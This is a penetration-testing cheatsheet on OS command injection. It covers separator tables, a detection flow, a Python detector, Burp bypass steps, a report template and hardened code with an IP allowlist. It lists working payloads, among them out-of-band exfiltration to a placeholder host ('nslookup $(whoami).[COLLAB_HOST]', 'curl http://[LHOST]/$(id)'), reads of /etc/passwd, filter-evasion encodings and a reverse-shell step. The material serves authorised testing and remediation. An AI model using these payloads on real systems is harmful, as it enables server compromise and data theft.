🛡️ Methodology Checklist
- Identify injection point: URL params, POST body, headers, cookies
- Test for inline injection: ; id, && id, | id, $(id), `id`
- Confirm blind injection: time-based (; sleep 5), DNS OOB
- Exfiltrate data via DNS for blind: ; nslookup $(whoami).[COLLAB_HOST]
- Establish reverse shell once confirmed
- Test all injection characters: & | ; ` $() {} newline
- Document exact injection point and parameter for report
🎯 Operational Context
Use when: User-supplied input passed to OS command without sanitization — inject command separators (;, &&, |, backtick) to execute arbitrary commands.
Think Dumber First: Test all injection chars: ; id, && id, | id, $(id), `id`. Check if output is reflected or blind. Simple ;id in a ping field often works first try.
Skip when: Input is properly validated and sanitized — pivot to other injection techniques (SQLi, SSTI, XXE).
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| 127.0.0.1; whoami | Semicolon: reliable in Linux shells and PowerShell, not supported by Windows CMD |
| 127.0.0.1%0a whoami | URL-encoded newline: alternative Linux separator, often survives filters that strip ; |
| 127.0.0.1& whoami | Ampersand: works on Linux and CMD. On Linux it backgrounds the first command and runs the second in the foreground; on CMD it simply runs both (space before whoami keeps the two commands unambiguous) |
| 127.0.0.1 \| whoami | Pipe: only the second command's output is shown |
| 127.0.0.1&& whoami | AND: second runs only if the first succeeds |
| 127.0.0.1\|\| whoami | OR: second runs only if the first fails, so make the first fail deliberately (127.0.0.1x \|\| whoami) |
| 127.0.0.1; whoami, intercept, change to 127.0.0.1%0a whoami | Edit the request in Burp Repeater after it leaves the browser to bypass client-side JS validation |
| $(whoami) | Inline subshell: inject inside a string without needing a separator |
| `whoami` | Backtick subshell: alternative to $() |
🔬 Deep Dive & Workflow
Operator Comparison Table
| Operator | Linux | Windows CMD | PowerShell | Notes |
|---|---|---|---|---|
| ; | ✅ | ❌ | ✅ | Not supported in CMD |
| \n (%0a) | ✅ | ❌ | ✅ | URL-encode the newline |
| & | ✅ | ✅ | ❌ | Linux: backgrounds the first command, both outputs shown; CMD: runs both. In PowerShell & is the call operator, not a separator (a trailing & only starts a background job in PowerShell 7+) |
| \| | ✅ | ✅ | ✅ | Only the second command's output shown |
| && | ✅ | ✅ | ✅ (7+) | Second runs only if the first succeeds; PowerShell 7+ only, a parse error in 5.1 |
| \|\| | ✅ | ✅ | ✅ (7+) | Second runs only if the first fails; PowerShell 7+ only |
| $(cmd) | ✅ | ❌ | ✅ | Inline subshell (subexpression in PowerShell) |
| `cmd` | ✅ | ❌ | ❌ | Backtick subshell; in PowerShell the backtick is the escape character |
Detection Flow
```text
Test input: 127.0.0.1; whoami
├── Command output appears in the response → classic (non-blind) injection
└── No command output in the response → blind injection, confirm out-of-band:
    ├── Time delay: 127.0.0.1; sleep 5   (compare against a baseline request time)
    ├── DNS OOB:    127.0.0.1; nslookup [LHOST]   (needs a DNS name whose lookups you can observe)
    └── HTTP OOB:   127.0.0.1; curl http://[LHOST]/$(whoami)
```
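The detection flow above, automated: this is an added example, not code from the original cheatsheet. It tries one payload per separator and subshell form from the operator table against a callable target, classifies the result as classic (output reflected) or blind (only a time delay proves execution), and uses an arithmetic marker so that a reflected copy of the payload is never mistaken for execution. The target is a simulated vulnerable handler (an assumption: echo stands in for ping so it runs anywhere); `http_target` shows the assumed shape of a real HTTP target and is not exercised here.

```python
import subprocess
import time
import urllib.parse
import urllib.request
from typing import Callable, List, Tuple

# Arithmetic marker: the payload contains "1234+5678" but never the literal
# result, so "6912" in the response proves the shell evaluated the expression
# instead of merely reflecting the input.
EXPR = "$((1234+5678))"
MARKER = "6912"

# One payload per separator/subshell form.  "||" is omitted: it needs the first
# command to fail (127.0.0.1x || ...), which the simulated target cannot model.
PAYLOADS = {
    ";":       f"127.0.0.1; echo {EXPR}",
    "newline": f"127.0.0.1\necho {EXPR}",
    "&":       f"127.0.0.1& echo {EXPR}",
    "|":       f"127.0.0.1| echo {EXPR}",
    "&&":      f"127.0.0.1&& echo {EXPR}",
    "$()":     f"127.0.0.1$(echo {EXPR})",
    "``":      f"127.0.0.1`echo {EXPR}`",
}


def vulnerable_ping(host: str, reflect: bool = True) -> str:
    """Simulated vulnerable handler (assumption: stands in for a ping form).
    The user value is concatenated into a shell command string; echo replaces
    ping so the example runs offline.  reflect=False models a blind endpoint
    that executes the command but never returns its output."""
    proc = subprocess.run(f"echo PING {host}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout if reflect else "Ping sent"


def detect(target: Callable[[str], str], delay: int = 1) -> Tuple[str, List[str]]:
    """('classic', working separators) if output is reflected,
    ('blind', ['time']) if only a delay proves execution, else ('none', [])."""
    working = [name for name, payload in PAYLOADS.items()
               if MARKER in target(payload) and MARKER not in payload]
    if working:
        return "classic", working

    # Blind check: a sleep payload measured against a baseline request.
    t0 = time.monotonic()
    target("127.0.0.1")
    baseline = time.monotonic() - t0
    t0 = time.monotonic()
    target(f"127.0.0.1; sleep {delay}")
    elapsed = time.monotonic() - t0
    if elapsed - baseline >= delay * 0.8:
        return "blind", ["time"]
    return "none", []


def http_target(url: str, param: str) -> Callable[[str], str]:
    """Assumed shape of a real target: POST the payload as one form parameter
    and return the body.  Not called here because it needs a live endpoint."""
    def send(value: str) -> str:
        data = urllib.parse.urlencode({param: value}).encode()
        with urllib.request.urlopen(url, data=data, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return send


if __name__ == "__main__":
    print("reflected:", detect(lambda h: vulnerable_ping(h, reflect=True)))
    print("blind    :", detect(lambda h: vulnerable_ping(h, reflect=False)))
    print("not vuln :", detect(lambda h: "Ping sent"))
```

Against a real endpoint, wrap the request in a callable (`detect(http_target("https://target/ping", "host"))`) and raise `delay` to 5 or more so normal latency jitter cannot produce a false positive; the marker trick (expression in, result out) is the same check used for subshell forms, where the result is glued onto the reflected input rather than printed on its own line.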
Front-End Bypass — Always Test in Burp
1. Submit normally — capture in Proxy
2. Send to Repeater (Ctrl+R)
3. Modify the parameter value to include injection operator + command
4. Common bypass: replace ; with %0a in Repeater (URL-encoded newline)
5. Send → look for command output in response body
Client-side validation (JS-only) provides zero security — all input must be validated server-side. Bypassing it via Burp is the standard first step.
Common Initial Test Commands
```text
# Linux, safe enumeration
whoami; id; hostname; uname -a; cat /etc/passwd
# Windows, safe enumeration
whoami & ipconfig & systeminfo
# DNS OOB (blind, no direct output)
nslookup [LHOST]
curl http://[LHOST]/
```
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Injection char filtered | WAF or server-side filter | Try URL encoding: %3b=;, %26%26=&&; also try newline %0a as separator |
| Command executes but no output | Blind command injection | Use OOB: curl http://[LHOST]/$(id) or nslookup $(id).[LHOST] |
| Only specific commands work | Restricted shell or limited PATH | Identify the shell that runs the command (which bash sh dash ksh); use absolute paths (/usr/bin/id, /bin/cat); try alternate syntax such as $() or newline instead of ; |
| Windows target, Linux commands fail | OS mismatch | Use Windows commands: whoami, ipconfig, dir; in a PowerShell context use $(whoami) or $(Get-Item .).FullName |
| Command injection in JSON/XML body | Encoding context wrong | Ensure proper JSON escaping; inject in string value field, not key |
📝 Reporting Trigger
Finding Title: OS Command Injection in User Input Field
Impact: Command injection allows execution of arbitrary operating system commands in the context of the web server process, enabling server compromise, credential extraction, and lateral movement to internal network resources.
Root Cause: User-supplied input passed directly to OS command execution function (PHP exec(), Python os.system(), Java Runtime.exec()) without input validation or sanitization.
Recommendation: Never pass user input to OS command execution functions. Replace the shell call with a library function for the intended operation. Where a command is unavoidable, pass the validated value as a single argument in an argv array without invoking a shell (Python subprocess.run([...]) with shell=False, Java ProcessBuilder, PHP escapeshellarg() as a last resort) and enforce strict allowlist validation (for example, accept only a literal IP address). Run the web application as a dedicated low-privilege service account. Apply WAF rules for command injection patterns as a detective control, not as the fix.
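The root cause and the fix from the report template side by side, as an added example rather than code from the original page. A ping feature is simulated with echo (an assumption so it runs anywhere); the three handlers show the concatenated shell string that causes the finding, the argv-only call that removes the shell, and the allowlist check that rejects the payload before any command runs.

```python
import ipaddress
import subprocess
from typing import List


def vulnerable_ping(host: str) -> str:
    """Root cause: user input concatenated into a shell command string.
    Equivalent to PHP exec("ping -c 1 " . $host) or Python os.system()."""
    proc = subprocess.run(f"echo PING {host}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def no_shell_ping(host: str) -> str:
    """Defence in depth: an argv list makes separators and subshell syntax part
    of one argument instead of part of the command line.  Still validate where
    you can: the program itself may interpret a leading '-' as an option."""
    proc = subprocess.run(["echo", "PING", host], shell=False,
                          capture_output=True, text=True)
    return proc.stdout


def validate_host(host: str) -> str:
    """Allowlist validation: accept only a literal IPv4/IPv6 address.  Anything
    else (separators, subshells, hostnames) is rejected before a command is
    built.  Use a strict hostname pattern instead if DNS names are required."""
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError as exc:
        raise ValueError(f"rejected host value: {host!r}") from exc


def is_rejected(host: str) -> bool:
    """True when validate_host refuses the value."""
    try:
        validate_host(host)
    except ValueError:
        return True
    return False


def hardened_ping(host: str) -> str:
    """The fix: validated value passed as one argv element, never via a shell.
    Java equivalent: new ProcessBuilder("ping", "-c", "1", host)."""
    argv: List[str] = ["echo", "PING", validate_host(host)]
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return proc.stdout


def injected(output: str) -> bool:
    """True when a whole output line is the marker, i.e. the injected command
    ran on its own rather than being echoed back as text."""
    return "INJECTED" in output.splitlines()


PAYLOAD = "127.0.0.1; echo INJECTED"   # constructed attacker input

if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_ping(PAYLOAD)))   # marker on its own line
    print("argv only :", repr(no_shell_ping(PAYLOAD)))     # payload echoed as text
    print("hardened  :", "rejected" if is_rejected(PAYLOAD) else hardened_ping(PAYLOAD))
    print("hardened  :", repr(hardened_ping("127.0.0.1")))
```

The vulnerable handler prints INJECTED on its own line because /bin/sh parsed the semicolon; the argv version prints the whole payload as a literal argument, which is exactly the "command executes but output looks wrong" symptom a tester sees when the target is not actually vulnerable. The hardened version never reaches the command at all for the payload.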